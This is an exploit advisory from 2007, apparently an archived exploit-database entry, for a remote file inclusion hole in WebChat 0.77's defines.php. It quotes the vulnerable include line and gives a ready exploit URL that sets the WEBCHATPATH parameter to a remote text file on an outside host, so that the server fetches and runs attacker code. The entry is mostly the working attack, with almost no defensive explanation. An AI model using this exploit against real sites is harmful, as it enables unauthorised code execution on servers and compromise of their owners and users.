id: 1409
date: 01/21/2007
title: WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln
author: v1per-haCker
cves: 

===============================================================
WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln
===============================================================




######################################################################### 
# 
#           [ webchat ] 
# 
# Class:     File Include Vulnerability  
# Published  2007/1/21 
# Remote:    Yes  
# Critical   Level : Dangerous 
# Author:    TheViper-hacker  
#   
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include ($WEBCHATPATH.'language/english.php');
=======================================================
Exploit :       
Http:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?
 
 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
--------------------------------------||  Viva ISLAM ||-----------------------------------------



#  0day.today [2023-03-21]  #